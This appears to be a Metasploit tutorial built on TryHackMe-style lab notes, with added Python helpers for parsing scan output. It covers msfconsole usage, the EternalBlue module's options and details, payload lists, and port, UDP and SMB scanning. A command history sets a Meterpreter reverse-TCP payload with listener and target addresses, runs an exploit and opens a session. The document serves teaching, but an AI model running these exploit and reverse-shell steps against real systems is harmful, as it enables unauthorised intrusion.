1. Command
msfconsole
┌──(root💀kali)-[/opt/metasploit]
└─# msfconsole 1 ⨯
https://metasploit.com
=[ metasploit v6.1.20-dev ]
+ -- --=[ 2186 exploits - 1159 auxiliary - 399 post ]
+ -- --=[ 595 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View advanced module options with advanced
ping
Ping Google's DNS IP (8.8.8.8) from inside msfconsole
msf6 > ping -c 1 8.8.8.8
[*] exec: ping -c 1 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=58.8 ms
--- 8.8.8.8 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 58.805/58.805/58.805/0.000 ms
set
msf6 > help set
Usage: set [option] [value]
Set the given option to value. If value is omitted, print the current value.
If both are omitted, print options that are currently set.
If run from a module context, this will set the value in the module's
datastore. Use -g to operate on the global datastore.
If setting a PAYLOAD, this command can take an index from `show payloads'.
history
msf6 > history
1 exit
2 msfconsole -h
3 db_status
4 help
5 db_nmap -sV MACHINE_IP
6 db_nmap -sV 10.10.51.161
7 hosts
8 services
9 vulns
10 use icecast
11 search multi/handler
12 use NUMBER_NEXT_TO exploit/multi/handler
13 use 6
14 use 6 exploit/multi/handler
15 use 6
16 use6
17 use 4
18 search multi/handler
19 use 6
20 use NUMBER_FROM_PREVIOUS_QUESTION
21 back
22 use NUMBER_FROM_PREVIOUS_QUESTION
23 set PAYLOAD windows/meterpreter/reverse_tcp
24 set LHOST YOUR_IP_ON_TRYHACKME
25 set LHOST 10.8.31.30
26 use icecast
27 set RHOSTS 10.10.51.161
28 run -j
29 jobs
30 exploit
31 job
32 jobs
33 run
34 set lhost 10.8.31.30
35 run
36 jobs
37 session -i 1
38 sessions -i 1
39 run
40 run post/multi/recon/local_exploit_suggeste
41 set rhosts 10.10.51.161
42 set lhost 10.8.31.30
43 run post/multi/recon/local_exploit_suggeste
44 run
45 set rhosts 10.10.51.161
46 run
47 back
48 use icecast
49 set rhosts 10.10.51.161
50 set lhost 10.8.31.30
51 run
52 s
53 ls
54 ping -c 1 8.8.8.8
55 help set
msfconsole is managed by context. In other words, unless you set a variable globally, every parameter you set is lost the moment you change the module you have decided to use. In the example below the ms17_010_eternalblue exploit was used; if you switch to another module (for example a port scanner), everything you changed stays in the ms17_010_eternalblue exploit context, so the RHOSTS value has to be set again.
EternalBlue is an exploit, reportedly developed by the US NSA, for a vulnerability affecting the SMBv1 server of a large number of Windows systems. SMB is widely used on Windows networks for file sharing and for sending files to printers. EternalBlue was leaked by the Shadow Brokers, and the vulnerability was exploited worldwide in the WannaCry ransomware attack.
The show options command produces different output depending on the context in which it is used. The example below shows that the RHOSTS, RPORT, VERIFY_ARCH and VERIFY_TARGET variables need to be set. A post-exploitation module, on the other hand, only needs the SESSION ID to be set. A session is an existing connection to the target system that a post-exploitation module will use.
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.254.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
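To turn the "required options" point into a check you can run, here is an added Python example (my own code, not from the original post or from Metasploit) that parses show options output like the one above and lists the required options that still have no value. The sample text is constructed to resemble that output, including a description wrapped mid-word the way msfconsole prints it.

```python
import re

# Constructed sample modelled on the show options output above (values are illustrative).
SAMPLE = """\
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s)
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windo
                                             ws Embedded Standard 7 target machines.
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
"""

SECTION = re.compile(r"^(?:Module|Payload) options \((?P<name>[^)]+)\):")

def parse_show_options(text):
    """Map each section to a list of (name, current, required, description) tuples.

    Fields are split on runs of two or more spaces, so exact column widths do not matter;
    an empty Current Setting is detected because Required is always 'yes' or 'no'. Lines
    indented past the Name column continue the previous (mid-word wrapped) description.
    """
    sections, section, name_col = {}, None, None
    for line in text.splitlines():
        m = SECTION.match(line)
        if m:
            section, name_col = m.group("name"), None
            sections[section] = []
            continue
        if section is None or not line.strip():
            continue
        indent = len(line) - len(line.lstrip(" "))
        if name_col is None:                     # first non-empty line is the column header
            name_col = indent
            continue
        if line.strip().startswith("----"):
            continue
        if indent > name_col and sections[section]:   # wrapped description continuation
            name, cur, req, desc = sections[section][-1]
            sections[section][-1] = (name, cur, req, desc + line.strip())
            continue
        parts = re.split(r" {2,}", line.strip())
        if len(parts) > 1 and parts[1] in ("yes", "no"):
            parts.insert(1, "")                  # Current Setting column is empty
        sections[section].append((parts[0], parts[1], parts[2], " ".join(parts[3:])))
    return sections

def missing_required(text):
    """Names of options with Required=yes and no Current Setting, in display order."""
    return [name for opts in parse_show_options(text).values()
            for name, current, required, _ in opts if required == "yes" and not current]
```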
show
The show command can be used in any context, followed by a module type (auxiliary, payload, exploit, etc.), to list the available modules.
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/windows/x64/exec normal No Windows x64 Execute Command
4 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
5 payload/windows/x64/messagebox normal No Windows MessageBox x64
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
20 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
21 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
22 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
23 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
24 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
25 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
26 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
27 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
28 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
29 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
30 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
31 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
32 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
33 payload/windows/x64/powershell_reverse_tcp_ssl normal No Windows Interactive Powershell Session, Reverse TCP SSL
34 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
35 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
36 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
37 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
38 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
39 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
40 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
41 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
42 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
43 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
44 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
45 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
46 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
47 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
48 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
49 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
50 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
51 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
52 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
53 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
54 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
55 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
56 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
57 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
back
Leaves the current context.
msf6 exploit(windows/smb/ms17_010_eternalblue) > back
msf6 >
info
Additional information about any module can be obtained with the info command from within its context.
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by:
Equation Group
Shadow Brokers
sleepya
Sean Dillon <sean.dillon@risksense.com>
Dylan Davis <dylan.davis@risksense.com>
thelightcosine
wvu <wvu@metasploit.com>
agalway-r7
cdelafuente-r7
cdelafuente-r7
agalway-r7
Available targets:
Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit,
part of the FuzzBunch toolkit released by Shadow Brokers. There is a
buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is
calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error
where a DWORD is subtracted into a WORD. The kernel pool is groomed
so that overflow is well laid-out to overwrite an SMBv1 buffer.
Actual RIP hijack is later completed in
srvnet!SrvNetWskReceiveComplete. This exploit, like the original may
not trigger 100% of the time, and should be run continuously until
triggered. It seems like the pool will get hot streaks and need a
cool down period before the shells rain in again. The module will
attempt to use Anonymous login, by default, to authenticate to
perform the exploit. If the user supplies credentials in the
SMBUser, SMBPass, and SMBDomain options it will use those instead.
On some systems, this module may cause system instability and
crashes, such as a BSOD or a reboot. This may be more likely with
some payloads.
References:
https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
https://nvd.nist.gov/vuln/detail/CVE-2017-0143
https://nvd.nist.gov/vuln/detail/CVE-2017-0144
https://nvd.nist.gov/vuln/detail/CVE-2017-0145
https://nvd.nist.gov/vuln/detail/CVE-2017-0146
https://nvd.nist.gov/vuln/detail/CVE-2017-0147
https://nvd.nist.gov/vuln/detail/CVE-2017-0148
https://github.com/RiskSense-Ops/MS17-010
https://risksense.com/wp-content/uploads/2018/05/White-Paper_Eternal-Blue.pdf
https://www.exploit-db.com/exploits/42030
Also known as:
ETERNALBLUE
Search
Searches can be performed using a CVE number, an exploit name (eternalblue, heartbleed, etc.) or the target system.
2. Scanning
Port scanning
Metasploit has several modules for scanning the open ports of a target system or network.
msf6 > search portscan
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/portscan/ftpbounce normal No FTP Bounce Port Scanner
1 auxiliary/scanner/natpmp/natpmp_portscan normal No NAT-PMP External Port Scanner
2 auxiliary/scanner/sap/sap_router_portscanner normal No SAPRouter Port Scanner
3 auxiliary/scanner/portscan/xmas normal No TCP "XMas" Port Scanner
4 auxiliary/scanner/portscan/ack normal No TCP ACK Firewall Scanner
5 auxiliary/scanner/portscan/tcp normal No TCP Port Scanner
6 auxiliary/scanner/portscan/syn normal No TCP SYN Port Scanner
7 auxiliary/scanner/http/wordpress_pingback_access normal No Wordpress Pingback Locator
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access
To use a port scanning module, a few options need to be set.
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
- CONCURRENCY: the number of targets to scan at the same time
- PORTS: the port range to scan. The default of 1-10000 differs from Nmap: Nmap scans the 1000 most commonly used ports, whereas Metasploit scans port numbers 1 through 10000.
- RHOSTS: the target or target network to scan
- THREADS: the number of threads used at the same time. The more threads, the faster the scan.
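As an added example (my own Python, not code from the post or from Metasploit), the following expands a PORTS value in the format the option description above shows, and uses the THREADS and CONCURRENCY descriptions from show options to work out how much connection traffic a given configuration generates. The port-spec rules it applies are my assumption, not a copy of Metasploit's implementation.

```python
def parse_portspec(spec, low=1, high=65535):
    """Expand a PORTS value such as '22-25,80,110-900' into a sorted list of unique ports.

    Assumed rules (not Metasploit's own code): comma-separated single ports or ranges,
    a reversed range like 25-22 is accepted, and a non-numeric entry or a port outside
    low..high raises ValueError.
    """
    ports = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if "-" in item:
            start, end = (int(x) for x in item.split("-", 1))
            if start > end:
                start, end = end, start
        else:
            start = end = int(item)
        if start < low or end > high:
            raise ValueError(f"port out of range in {item!r}")
        ports.update(range(start, end + 1))
    return sorted(ports)

def is_valid_portspec(spec):
    """True if parse_portspec accepts the value, False otherwise."""
    try:
        parse_portspec(spec)
        return True
    except ValueError:
        return False

def scan_workload(spec, hosts, threads, concurrency):
    """(total connect attempts, maximum connections in flight) for the given options.

    Follows the option descriptions in show options above: THREADS runs at most one
    thread per host, and CONCURRENCY is the number of ports checked at once per host.
    """
    attempts = len(parse_portspec(spec)) * hosts
    return attempts, min(threads, hosts) * concurrency
```

With the module defaults (PORTS 1-10000, THREADS 1, CONCURRENCY 10) a single host receives 10000 connection attempts, ten at a time, which is what makes the scan visible in connection logs.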
UDP service identification
The scanner/discovery/udp_sweep module can quickly identify services running over UDP (User Datagram Protocol).
msf6 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.10.61.253->10.10.61.253 (1 hosts)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
SMB scan
Metasploit provides several useful auxiliary modules that scan a specific service. The following is an SMB example. (Useful ones on a corporate network are smb_enumshares and smb_version, but invest the time to check which scanners the Metasploit version installed on your system provides.)
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.10.61.253:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{312d7069-2d30-3031-2d36-312d32353300}) (authentication domain:IP-10-10-61-253)
[*] 10.10.61.253:445 - Host could not be identified: Windows 6.1 (Samba 4.7.6-Ubuntu)
[*] 10.10.61.253: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
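As an added example (my own Python, not code from the post or from Metasploit), the following parses smb_version output lines like the ones above into per-host fields and raises the two hardening findings a defender would take from this banner: SMBv1 still enabled, and SMB signing not enforced. The first host mirrors the output above; the second host (192.0.2.10, a documentation address) and its GUID are constructed placeholders.

```python
import re

# Constructed sample lines: the first two mirror the smb_version output above,
# the 192.0.2.10 host is a placeholder showing a hardened configuration.
SAMPLE_LINES = [
    "[*] 10.10.61.253:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) "
    "(compression capabilities:) (encryption capabilities:AES-128-CCM) (signatures:optional) "
    "(guid:{312d7069-2d30-3031-2d36-312d32353300}) (authentication domain:IP-10-10-61-253)",
    "[*] 10.10.61.253:445 - Host could not be identified: Windows 6.1 (Samba 4.7.6-Ubuntu)",
    "[*] 192.0.2.10:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) "
    "(compression capabilities:) (encryption capabilities:AES-128-GCM) (signatures:required) "
    "(guid:{00000000-0000-0000-0000-000000000000}) (authentication domain:EXAMPLE)",
    "[*] 192.0.2.10: - Scanned 2 of 2 hosts (100% complete)",
]

DETECTED = re.compile(r"^\[\*\] (?P<host>[\d.]+):\d+ - SMB Detected (?P<fields>.*)$")
FIELD = re.compile(r"\((?P<key>[^:()]+):(?P<value>[^)]*)\)")       # one "(key:value)" group
OS_GUESS = re.compile(r"^\[\*\] (?P<host>[\d.]+):\d+ - Host could not be identified: (?P<os>.+)$")

def parse_smb_version(lines):
    """Map host -> dict of the bracketed fields (versions as a list) plus 'os_guess'."""
    hosts = {}
    for line in lines:
        m = DETECTED.match(line)
        if m:
            fields = {k.strip(): v.strip() for k, v in FIELD.findall(m.group("fields"))}
            fields["versions"] = [v.strip() for v in fields.get("versions", "").split(",") if v.strip()]
            hosts[m.group("host")] = fields
            continue
        m = OS_GUESS.match(line)
        if m:
            hosts.setdefault(m.group("host"), {"versions": []})["os_guess"] = m.group("os")
    return hosts

def smb_findings(fields):
    """Hardening findings for one host, judged from its banner alone."""
    findings = []
    if "1" in fields["versions"]:
        findings.append("SMBv1 enabled: the MS17-010/EternalBlue attack surface; disable SMBv1 and patch")
    if fields.get("signatures") != "required":
        findings.append(f"SMB signing is '{fields.get('signatures', 'unknown')}': require signing")
    return findings
```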
When performing service scans, it is important not to skip unusual services such as NetBIOS. NetBIOS (Network Basic Input Output System), similar to SMB, lets computers communicate over a network to share files or send files to a printer. A target system's NetBIOS name can give an idea of its role and importance (e.g. CORP-DC, DEVOPS, SALES). It may also expose shared files and folders that can be accessed without a password or are protected only by a simple one (e.g. admin, administrator, root, toor).